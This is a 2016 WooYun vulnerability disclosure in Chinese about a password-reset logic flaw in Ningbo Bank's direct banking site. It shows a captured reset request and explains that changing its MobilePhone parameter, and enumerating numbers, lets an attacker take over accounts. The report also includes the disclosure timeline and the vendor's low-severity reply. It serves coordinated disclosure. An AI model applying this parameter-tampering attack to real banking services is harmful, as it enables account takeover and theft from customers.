当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0186309

漏洞标题:P2P金融安全之宁波银行直销银行任意账户登录

相关厂商:宁波银行股份有限公司

漏洞作者: 咚咚呛

提交时间:2016-03-18 23:10

修复时间:2016-05-03 21:39

公开时间:2016-05-03 21:39

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心,宁波银行股份有限公司)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-18: 细节已通知厂商并且等待厂商处理中
2016-03-19: 厂商已经确认,细节仅向厂商公开
2016-03-29: 细节向核心白帽子及相关领域专家公开
2016-04-08: 细节向普通白帽子公开
2016-04-18: 细节向实习白帽子公开
2016-05-03: 细节向公众公开

简要描述:

宁波银行直销银行,业务量一直在我国直销银行中名列前茅,2015年评选直销银行第9名,此次风险影响宁波直销银行的所有账户。 ------请认准金融小能手

详细说明:

此风险漏洞在密码找回功能中,漏洞利用步骤如下:
1、首先正常操作密码找回功能,可知其流程如下,
填写手机号及正确的短信验证码,如图:

31.jpg


2、输入要修改的密码,并进行抓包,如图:

32.jpg


数据包如下:

POST /desktop/RetrievePassword4Y.do HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Language: zh-cn
$referer: htmls/RetrievePassword/mod.html
Referer: https://**.**.**.**/desktop/index.html#/main/RetrievePassword/mod$inTrs
Content-Type: application/json;charset=utf-8
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Tablet PC 2.0)
Host: **.**.**.**
Content-Length: 168
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: web_vist_num=1; loginMark=zx; Hm_lvt_90e7f27474e0f7bc4b4462d412174657=1458294872,1458295213; is_si_expire=0; iss_webanalytics_id=b98afb0080834c4c9de697aae7e93092; JSESSIONID=00003aMfMqYLppOHcn5DdJ4uqop:-1; Hm_lpvt_90e7f27474e0f7bc4b4462d412174657=1458295213; si=3445ef42b685452b9e1817aeb57e5f29; nu=0; bfd_s=61335539.9085551.1458294880456; tmc=2.61335539.69562477.1458294880459.1458294880459.1458295236368; tma=61335539.69562477.1458294880459.1458294880459.1458294880459.1; tmd=2.61335539.69562477.1458294880459.; bfd_g=87205254007bf9520000d228000055b756ebcf3a
{"UserType":"ZY","MobilePhone":"15910773439","NewPassword":"k5/Qfh/Z+Uy2M3vP6dDTHg==","NewPasswordConfirm":"k5/Qfh/Z+Uy2M3vP6dDTHg==","_ChannelId":"pc","BankId":"9999"}


33.jpg


可完成密码修改重置功能

34.jpg


观察关键数据包/desktop/RetrievePassword4Y.do的参数MobilePhone为目标手机号,修改为被攻击者的手机号即可实现篡改帐户密码的攻击,如目标为15910676783,

36.jpg


登录后如:

37.jpg


可通过遍历手机号,完成篡改所有账户的目的,进而影响所有账户安全。

漏洞证明:

31.jpg


32.jpg


33.jpg


34.jpg


36.jpg


37.jpg

修复方案:

建议短信验证及密码重置数据包同意验证,防止分布绕过

版权声明:转载请注明来源 咚咚呛@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2016-03-19 21:39

厂商回复:

只对游客用户有影响,风险等级较低,已着手处理,非常感谢支持

最新状态:

暂无